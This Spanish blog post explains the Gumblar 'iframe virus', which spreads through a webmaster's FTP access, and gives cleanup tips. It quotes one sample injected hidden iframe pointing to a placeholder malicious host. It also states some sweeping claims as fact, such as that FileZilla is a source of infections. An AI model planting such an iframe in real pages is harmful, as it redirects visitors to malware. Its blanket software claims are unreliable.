¿Virus Iframe? ¿Conocías este virus?, seguramente si eres una internauta promedio utilizando un hosting -como casi todos- nunca habías oído hablar de este virus, pero no te preocupes, te vamos a explicar de qué se trata; En si es un troyano/virus que se instala en nuestro computador y cada vez que nosotros nos conectamos al FTP de nuestra página automáticamente inserta un código en todas nuestras páginas, si, así como lees! como si no fuera suficiente con los virus que podemos llegar a tener en nuestra PC ahora también debemos cuidar nuestras páginas webs.

Los virus iframes se caracterizan por incluir código en las páginas web, este código es en la forma de una iframe invisible que re direcciona al usuario a una web maligna en donde le infecta, a diferencia de otros tipos de malware, este virus requiere de webmasters para propagarse, básicamente lo que hace el virus es esperar por conexiones FTP al servidor, una vez que el webmaster o dueño de un sitio web ha accedido a su sitio vía FTP el virus pasa al sitio web en donde modifica algunas páginas html e inserta un código similar a:

1

<iframe src=”http://sitio_malicionso.xxx” width=109 height=147 style=”visibility: hidden”/>

No importa cuántas veces borremos el código de la web, el virus volverá aparecer, la razón es sencilla:

El PC del webmaster o persona con acceso FTP está infectado y cada vez que se conecta FTP el virus pasa a las páginas web.

A menudo los usuarios de hosting piensan que el servidor donde está su página tiene el virus, pero no es así, el virus está en el propio PC de los usuarios y esto está comprobado por todas los fabricantes de antivirus y en internet podrás observar a través de los buscadores que este es un virus netamente de usuario no de servidor.

Consejos para eliminar este virus:

1-    Limpiar el PC infectado (casi 90% de los usuarios dice por costumbre: NO…PERO TENGO ANTIVIRUS…IMPOSIBLE QUE MI PC ESTE INFECTADO…El afirmar esto es un error muy grave…ya que los antivirus en su mayoría no son capaces de detectar este virus , ya que es solo un código y no algo ejecutable, por lo tanto deja de pensar que tu PC es blindado, NO existe PC blindado!

2-    Asegúrate  de que dispones de un buen antivirus y el mismo se encuentra actualizado y además tengas instalado en tu PC anti-malwares.  ( SOLO ANTIVIRUS NO FUNCIONA)

3-    Usar la herramienta hijackthis para detectar la presencia del virus local.

4-    Ingresa a tu Cpanel, cambia las contraseñas.

5-    Elimina el código malicioso en las páginas web

6-    Si utilizas el FTP FILEZILLA, elimínalo inmediatamente de tu PC, el filezilla es fuente de infecciones. Utiliza otro software ftp pero NO filezilla.

ATENCION:

Este código malicioso también se inyecta en los CMS que no están actualizados!

Joomla es fuente de infecciones graves… POR LO TANTO MANTEN TU CMS SIEMPRE ACTUALIZADO y asegurate siempre de cambiar las contraseñas de administrador de JOOMLA.

Nombre del virus : GUMBLAR

Fuentes: http://en.wikipedia.org/wiki/Gumblar